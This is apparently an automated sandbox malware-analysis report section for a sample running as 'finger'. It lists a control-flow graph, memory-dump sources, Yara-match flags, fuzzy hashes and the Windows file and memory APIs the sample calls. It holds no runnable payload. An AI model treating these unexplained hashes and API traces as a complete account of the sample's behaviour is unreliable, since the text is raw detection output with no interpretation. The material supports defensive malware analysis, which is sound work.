                                                                                                                                            control_flow_graph 27 2f49e40-2f4a284 29 2f4a28b-2f4a297 27->29 30 2f4a2bc-2f4a2c6 29->30 31 2f4a299-2f4a2ba 29->31 32 2f4a2d7-2f4a2e0 30->32 31->29 33 2f4a2f6-2f4a300 32->33 34 2f4a2e2-2f4a2f4 32->34 36 2f4a311-2f4a31a 33->36 34->32 37 2f4a344 36->37 38 2f4a31c-2f4a328 36->38 41 2f4a34b-2f4a364 37->41 39 2f4a32f-2f4a331 38->39 40 2f4a32a-2f4a32e 38->40 42 2f4a342 39->42 43 2f4a333-2f4a33c 39->43 40->39 41->41 44 2f4a366-2f4a377 41->44 42->36 43->42 45 2f4a388-2f4a394 44->45 47 2f4a396-2f4a3a5 45->47 48 2f4a3a7-2f4a3b1 45->48 47->45 50 2f4a3c2-2f4a3ce 48->50 51 2f4a3d0-2f4a3dd 50->51 52 2f4a3df-2f4a3f0 50->52 51->50 54 2f4a401-2f4a40d 52->54 55 2f4a424-2f4a42e 54->55 56 2f4a40f-2f4a422 54->56 58 2f4a43f-2f4a448 55->58 56->54 59 2f4a44a-2f4a459 58->59 60 2f4a45b-2f4a464 58->60 59->58 61 2f4a59d-2f4a5a7 60->61 62 2f4a46a-2f4a474 60->62 65 2f4a5b8-2f4a5c4 61->65 64 2f4a485-2f4a48e 62->64 66 2f4a490-2f4a499 64->66 67 2f4a49b-2f4a4b3 64->67 68 2f4a5c6-2f4a5d9 65->68 69 2f4a5db-2f4a5e2 65->69 66->64 70 2f4a4b5-2f4a4bc 67->70 71 2f4a4f2-2f4a4fc 67->71 68->65 73 2f4a70c-2f4a716 69->73 74 2f4a5e8-2f4a5ef 69->74 76 2f4a4ed 70->76 77 2f4a4be-2f4a4eb 70->77 78 2f4a50d-2f4a519 71->78 81 2f4a727-2f4a733 73->81 79 2f4a626-2f4a630 74->79 80 2f4a5f1-2f4a624 74->80 76->61 77->70 82 2f4a52f-2f4a53b 78->82 83 2f4a51b-2f4a52d 78->83 84 2f4a641-2f4a64d 79->84 80->74 85 2f4a735-2f4a73e 81->85 86 2f4a74b-2f4a752 81->86 89 2f4a560-2f4a566 82->89 90 2f4a53d-2f4a55e 82->90 83->78 92 2f4a65d-2f4a664 84->92 93 2f4a64f-2f4a65b 84->93 94 2f4a740-2f4a746 85->94 95 2f4a749 85->95 87 2f4a754-2f4a766 86->87 88 2f4a77c-2f4a786 86->88 97 2f4a76d-2f4a76f 87->97 98 2f4a768-2f4a76c 87->98 100 2f4a56a-2f4a571 89->100 90->82 101 2f4a685 call 2f6b630 92->101 102 2f4a666-2f4a683 92->102 93->84 94->95 95->81 106 2f4a771-2f4a777 97->106 107 2f4a77a 97->107 98->97 103 2f4a573-2f4a596 100->103 104 2f4a598 100->104 108 2f4a68a-2f4a694 101->108 102->92 103->100 104->60 106->107 107->86 109 2f4a6a5-2f4a6b1 108->109 110 2f4a6c7-2f4a6d1 109->110 111 2f4a6b3-2f4a6c5 109->111 113 2f4a6e2-2f4a6ee 110->113 111->109 113->73 114 2f4a6f0-2f4a6fc 113->114 115 2f4a6fe-2f4a704 114->115 116 2f4a70a 114->116 115->116 116->113
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: !$!$$X$($,$.>$01$4$5\$8$8`$:$;?$<$=J$@$@=$B$D$E$FY$H$R$W$X$Z$]$] $_$b$b'$bJ$d$n[$wG$x^$yQ${$~$!$*$<$B$d
                                                                                                                                            • API String ID: 0-4228383014
                                                                                                                                            • Opcode ID: 5336195c679010024b900b36aac7660d2614c33ba52aef55ed0a0746d2db9185
                                                                                                                                            • Instruction ID: 27764907c556b13236c22e482dbf86c048732c6f08f53d8ac1693330ff586350
                                                                                                                                            • Opcode Fuzzy Hash: 5336195c679010024b900b36aac7660d2614c33ba52aef55ed0a0746d2db9185
                                                                                                                                            • Instruction Fuzzy Hash: CD32A0B0D05628CBEB64CF44C9A87DDBBB1BB55348F5081D9C6896B380DBB95AC9CF40
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F5CAC4
                                                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 02F5CAFF
                                                                                                                                            • FindClose.KERNELBASE(?), ref: 02F5CB0A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3541575487-0
                                                                                                                                            • Opcode ID: 9f520c8eb43a31d38e7f5d8b0d0826a3e8044e161c1e792f69fe4c7a71f6a48c
                                                                                                                                            • Instruction ID: a35222a766b3971b5f5da485042f66139f7f50ae42eabe9c478a137fa8adb5b0
                                                                                                                                            • Opcode Fuzzy Hash: 9f520c8eb43a31d38e7f5d8b0d0826a3e8044e161c1e792f69fe4c7a71f6a48c
                                                                                                                                            • Instruction Fuzzy Hash: 70318175A40318BBEB20DB60CC85FFB777DEB44784F144459BB09A6190DB74AA84CFA0
                                                                                                                                            APIs
                                                                                                                                            • NtCreateFile.NTDLL(?,?,?,?,?,97C467A0,?,?,?,?,?), ref: 02F696EE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: 3b72953985565114540f5d9b9afaf6d0dd9883191b30b95bf7fb6a1fe9d2f644
                                                                                                                                            • Instruction ID: acdfe163e80e385c4ff53b99b4d960e6f8fa8ce5cb77b095f84f57ad21db2b37
                                                                                                                                            • Opcode Fuzzy Hash: 3b72953985565114540f5d9b9afaf6d0dd9883191b30b95bf7fb6a1fe9d2f644
                                                                                                                                            • Instruction Fuzzy Hash: 4D31C2B5A00248AFCB14DF98CC80EEEB7B9EF89354F108219F919A7340D770A851CFA5
                                                                                                                                            APIs
                                                                                                                                            • NtReadFile.NTDLL(?,?,?,?,?,97C467A0,?,?,?), ref: 02F69846
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                            • Opcode ID: 02ef30ed1401b686cca2db6043f8bb476b0ffa679f0082c7a04b14c15aa9692e
                                                                                                                                            • Instruction ID: 157f2b1d6c3f6a7fb21e9de92f2b69b55baaf59478f55e9dad2f14b796e7a554
                                                                                                                                            • Opcode Fuzzy Hash: 02ef30ed1401b686cca2db6043f8bb476b0ffa679f0082c7a04b14c15aa9692e
                                                                                                                                            • Instruction Fuzzy Hash: 1431E9B5A00248AFDB14DF98CC40EEF77B9EF89354F108219F908A7240D770A911CFA5
                                                                                                                                            APIs
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(02F5213E,?,02F683EF,00000000,00000004,97C467A0,?,?,?,?,?,02F683EF,02F5213E), ref: 02F69B28
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                            • Opcode ID: 36eb2fd49f8f4dd0a814e016e2559ca72dd9badcf1e4fd20b6b9986feb012b3a
                                                                                                                                            • Instruction ID: 5665b63effd3349bdbf1c6e946d405e05da0674abe6f6e112786b495272508eb
                                                                                                                                            • Opcode Fuzzy Hash: 36eb2fd49f8f4dd0a814e016e2559ca72dd9badcf1e4fd20b6b9986feb012b3a
                                                                                                                                            • Instruction Fuzzy Hash: 592108B5A00349AFDB10DF98DC41EEF77B9EF89750F108209F919A7280D770A911CBA5
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                            • Opcode ID: 74e00cd2e70aced1ae344fc8a020418b5d94312c0693c0340a3b2fccb8910217
                                                                                                                                            • Instruction ID: de2aadfc67723531100eb142718fea1e93fb565e037e31a4079399a60e1dbdb8
                                                                                                                                            • Opcode Fuzzy Hash: 74e00cd2e70aced1ae344fc8a020418b5d94312c0693c0340a3b2fccb8910217
                                                                                                                                            • Instruction Fuzzy Hash: B8112171A00304BAD620EB54CC45FBB77ADEF85754F508549FA08A7280D7756905CBA5
                                                                                                                                            APIs
                                                                                                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F69927
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            • Opcode ID: 1cd20186e759e6351d983e6f235037a090fb2e5414a9fe944c6e4cca1723c09b
                                                                                                                                            • Instruction ID: 436ea721ff9109d71845c22ce9611b8e9743796d2de5e45f78458993f1af9bc8
                                                                                                                                            • Opcode Fuzzy Hash: 1cd20186e759e6351d983e6f235037a090fb2e5414a9fe944c6e4cca1723c09b
                                                                                                                                            • Instruction Fuzzy Hash: 20E04F312002447BD210EA59DC00FAB775DDBC5750F508459FA18A7181C770B9008AE4
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 52c4432754d348b23c11c4eb7ebef85ff23a283fd18ca229c231f138382cd4b1
                                                                                                                                            • Instruction ID: 83a6a213ea7f8b399b2428149fbcf9fe846c662be47b50882e186d49e964075c
                                                                                                                                            • Opcode Fuzzy Hash: 52c4432754d348b23c11c4eb7ebef85ff23a283fd18ca229c231f138382cd4b1
                                                                                                                                            • Instruction Fuzzy Hash: D3900231605804529140B1585884546400997E0301B56C022E0424554C8B598A565371
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 2efc0d11673f7699e079ed318398a77ce2e8d13464ea158559b7accf1add42ec
                                                                                                                                            • Instruction ID: 9748893d3e6c6f5945f7a5086b32b1ec175523a25916dd75d6b0edf77fec2347
                                                                                                                                            • Opcode Fuzzy Hash: 2efc0d11673f7699e079ed318398a77ce2e8d13464ea158559b7accf1add42ec
                                                                                                                                            • Instruction Fuzzy Hash: 77900261601504824140B1585804406600997E1301396C126A0554560C875D89559379
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 9dbbe0e7d0e93edd4384e4eecb75fd9635392a28b76299f0430b86860ba7df56
                                                                                                                                            • Instruction ID: b78cb4acd2ef45fc5940446b329b2bd55482eceb5c0cbdb73b8565dc4a6941bf
                                                                                                                                            • Opcode Fuzzy Hash: 9dbbe0e7d0e93edd4384e4eecb75fd9635392a28b76299f0430b86860ba7df56
                                                                                                                                            • Instruction Fuzzy Hash: E790023160540C42D150B1585414746000987D0301F56C022A0024654D879A8B5577B1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 67b85645fb8984dd2980ece9836df604f99323ec671ecb57f9e713f01253844c
                                                                                                                                            • Instruction ID: 6c9589c94f7886acff7077ed00b4c2d73dd6c9627d5ace605aa9de5559445035
                                                                                                                                            • Opcode Fuzzy Hash: 67b85645fb8984dd2980ece9836df604f99323ec671ecb57f9e713f01253844c
                                                                                                                                            • Instruction Fuzzy Hash: 9090023120544C82D140B1585404A46001987D0305F56C022A0064694D976A8E55B771
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 007ba3bcd734ce05d3c405c2c589fb1df4190d79c67d7c163f8671e79e197dfd
                                                                                                                                            • Instruction ID: 5c08ad22de27e8db3022e9b5cea129209769fdd2144b66cf06790fdd8de2fa0f
                                                                                                                                            • Opcode Fuzzy Hash: 007ba3bcd734ce05d3c405c2c589fb1df4190d79c67d7c163f8671e79e197dfd
                                                                                                                                            • Instruction Fuzzy Hash: 6690023120140C42D180B158540464A000987D1301F96C026A0025654DCB5A8B5977B1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: c8e5ad236a62f7ff17325d51e087b44dcd6b40274a1de81301ea05daa5aea0b6
                                                                                                                                            • Instruction ID: fe0132562729a13ca1b52068fe51bfb7d14c342369479abf539d526fe04df53a
                                                                                                                                            • Opcode Fuzzy Hash: c8e5ad236a62f7ff17325d51e087b44dcd6b40274a1de81301ea05daa5aea0b6
                                                                                                                                            • Instruction Fuzzy Hash: 48900261202404434105B1585414616400E87E0201B56C032E1014590DC66A89916235
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 7bd242be2412b0a8bce394737cdc154860f6ac759535e84cefe9363bb45352c9
                                                                                                                                            • Instruction ID: 814b9b99dc837f0935d8d172d12fbec6456bc82410a86411417cce186c081e39
                                                                                                                                            • Opcode Fuzzy Hash: 7bd242be2412b0a8bce394737cdc154860f6ac759535e84cefe9363bb45352c9
                                                                                                                                            • Instruction Fuzzy Hash: 4C900225221404420145F558160450B044997D6351396C026F1416590CC76689655331
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 6134ad097d21114f74ed7e691dbff1011e3ccfe046d5618fb71949be4273bd84
                                                                                                                                            • Instruction ID: c1adef1db1d5d02e086832a3c2116783dec50a5959dd3491d4ed28f4a8c599f9
                                                                                                                                            • Opcode Fuzzy Hash: 6134ad097d21114f74ed7e691dbff1011e3ccfe046d5618fb71949be4273bd84
                                                                                                                                            • Instruction Fuzzy Hash: F5900435311404430105F55C1704507004FC7D5351357C033F1015550CD777CD715331
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 1b6854fbae2ba3375125c99dc6e5c782642c72ad02277a70a6c478e0b0ac1baf
                                                                                                                                            • Instruction ID: 6ee41b2dd2ca2d660bf5648cf85819b8dcdfe05379025ef92f2af351339517fb
                                                                                                                                            • Opcode Fuzzy Hash: 1b6854fbae2ba3375125c99dc6e5c782642c72ad02277a70a6c478e0b0ac1baf
                                                                                                                                            • Instruction Fuzzy Hash: 02900221601404824140B16898449064009ABE1211756C132A0998550D869E89655775
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: f3533fc2074e987707d8ef85f715f0eeca34bb1281d7388ab6cb480c4e3f21e2
                                                                                                                                            • Instruction ID: 982179a19824cb9e51ba47336862c5f395af53b258e893287e189c067273fa46
                                                                                                                                            • Opcode Fuzzy Hash: f3533fc2074e987707d8ef85f715f0eeca34bb1281d7388ab6cb480c4e3f21e2
                                                                                                                                            • Instruction Fuzzy Hash: A6900221211C0482D200B5685C14B07000987D0303F56C126A0154554CCA5A89615631
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 5592fee38fcb57fa5a78fcb49a94f574e3ceef92350d92973ee09bd8f72d5f09
                                                                                                                                            • Instruction ID: a90348718d19bc53c67d6aaca9e0332e8fe597024b4acae314d975798808576e
                                                                                                                                            • Opcode Fuzzy Hash: 5592fee38fcb57fa5a78fcb49a94f574e3ceef92350d92973ee09bd8f72d5f09
                                                                                                                                            • Instruction Fuzzy Hash: 6090026134140882D100B1585414B060009C7E1301F56C026E1064554D875ECD526236
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: c29377ae627a0526931b14e863d4d2618a4f7c6a293be68834f2e1b208bb3dc7
                                                                                                                                            • Instruction ID: 8d69a2b6b8b4f468476ec9962f532c6c3329b094b839ac90a92824c81db7127c
                                                                                                                                            • Opcode Fuzzy Hash: c29377ae627a0526931b14e863d4d2618a4f7c6a293be68834f2e1b208bb3dc7
                                                                                                                                            • Instruction Fuzzy Hash: CC90022160140942D101B1585404616000E87D0241F96C033A1024555ECB6A8A92A231
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 8531f9f18a8acaef98e7da704b45edf9d005f055e14b973c130ace17c80bd9da
                                                                                                                                            • Instruction ID: 911627ef2c71130dd3b4c3116e19f18a454f82d4a97a54e69592b6166fe21930
                                                                                                                                            • Opcode Fuzzy Hash: 8531f9f18a8acaef98e7da704b45edf9d005f055e14b973c130ace17c80bd9da
                                                                                                                                            • Instruction Fuzzy Hash: 2690026120180843D140B5585804607000987D0302F56C022A2064555E8B6E8D516235
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 4c80f20a755a0d4715f283cbf5a27d563cc0698b7ac000a74dc6e302f156e82a
